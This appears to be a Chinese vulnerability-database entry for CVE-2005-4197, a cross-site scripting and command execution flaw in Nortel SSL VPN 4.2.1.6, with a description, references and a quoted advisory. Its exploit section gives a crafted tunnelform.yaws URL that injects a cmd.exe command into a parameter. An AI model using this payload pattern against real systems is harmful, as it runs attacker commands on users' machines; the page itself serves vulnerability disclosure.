Nortel SSL VPN跨站脚本/命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109413 漏洞类型 输入验证
发布时间 2005-12-08 更新时间 2006-01-12
CVE编号 CVE-2005-4197 CNNVD-ID CNNVD-200512-228
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26771
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-228
|漏洞详情
NortelSSLVPN是远程访问安全解决方案,可以使用安全套接字层(SSL)做为基础安全协议。Nortel的SSLVPN的WEB界面没有充分的验证用户输入,因此攻击者可以在某些页面的链接中隐藏命令。由于从这些页面中所调用的JavaApplet是经过加密签名的,因此可能以使用浏览器用户的权限执行任意系统命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/15798/info

Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible.

Nortel SSL VPN 4.2.1.6 is vulnerable to this issue; other versions may also be affected. 

https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...
|参考资料

来源:BID
名称:15798
链接:http://www.securityfocus.com/bid/15798
来源:BUGTRAQ
名称:20051212SECConsultSA-20051211-0::NortelSSLVPNCrossSiteScripting/CommandExecution
链接:http://www.securityfocus.com/archive/1/archive/1/419263/100/0/threaded
来源:MISC
链接:http://www.sec-consult.com/247.html
来源:VUPEN
名称:ADV-2005-2845
链接:http://www.frsirt.com/english/advisories/2005/2845
来源:SECTRACK
名称:1015341
链接:http://securitytracker.com/id?1015341
来源:SECUNIA
名称:17974
链接:http://secunia.com/advisories/17974